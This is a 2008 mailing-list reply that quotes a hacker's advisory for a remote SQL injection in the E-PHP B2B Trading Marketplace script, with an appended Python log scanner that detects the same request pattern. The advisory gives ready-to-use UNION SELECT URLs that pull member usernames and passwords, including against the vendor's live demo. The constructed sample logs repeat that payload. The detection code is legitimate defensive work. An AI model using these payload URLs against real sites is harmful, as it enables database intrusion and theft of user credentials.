Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability

Already discovered:

http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: http://www.darkc0de.com/. Authored By r45c4l (r45c4l[at]hotmail.com)

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
> |___________________________________________________|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___________________________________________________
> |---------------------Hussin X----------------------|
> |
> |    Author: Hussin X
> |
> |    Home :  WwW.Hussin-X.CoM <http://www.hussin-x.com/>  |  www.tryag.cc/cc
> |
> |    email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___________________________________________________
> |                                                   |
> |
> | script : http://www.ephpscripts.com
> |
> |___________________________________________________|
> 
> Exploit:
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> ____________________________( Greetz )_________________________________
> |
> |    All members of the Forum  WwW.Hussin-X.CoM <http://www.hussin-x.com/> |
> WwW.TrYaG.CC <http://www.tryag.cc/>
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
> |
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |______________________________________________________________________
> 
> 
>                              Im IRAQi
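
A defender-side check for the request pattern in the advisory above, as an added example that is not part of the original thread: it scans web access logs for `listings.php` requests whose `cid` value is not a plain integer and reports which SQL keywords the decoded value contains. The log lines are constructed, the function name is hypothetical, and treating `cid` as a numeric category id is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (common log format); the client addresses are
# documentation-range placeholders. The second line carries the request
# pattern quoted in the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Sep/2008:12:00:01 +0000] "GET /Script/listings.php?browse=sell&cid=12 HTTP/1.1" 200 5120
192.0.2.44 - - [10/Sep/2008:12:03:17 +0000] "GET /Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- HTTP/1.1" 200 6033
192.0.2.44 - - [10/Sep/2008:12:03:40 +0000] "GET /Script/listings.php?browse=sell&cid=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8 HTTP/1.1" 200 4988
192.0.2.10 - - [10/Sep/2008:12:05:02 +0000] "GET /Script/index.php?cid=abc HTTP/1.1" 200 1200
192.0.2.77 - - [10/Sep/2008:12:06:00 +0000] "GET /Script/listings.php?browse=buy HTTP/1.1" 200 5000
"""

# Captures the client address and the request target of one log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: a legitimate cid is a short non-negative integer (category id).
CID_OK = re.compile(r"\d{1,10}")
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b", re.IGNORECASE)


def suspicious_cid_requests(log_text, script="listings.php", param="cid"):
    """Return (client, decoded value, SQL keywords seen) for each non-integer cid."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes both '+' and %20, so either encoding is caught.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if CID_OK.fullmatch(value):
                continue
            keywords = sorted({k.lower() for k in SQL_HINT.findall(value)})
            findings.append((client, value, keywords))
    return findings


if __name__ == "__main__":
    for client, value, keywords in suspicious_cid_requests(SAMPLE_LOG):
        print(client, keywords, value[:60])
```

The integer check is the primary signal; the keyword list only helps triage, since a non-numeric `cid` is anomalous on its own under the stated assumption.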


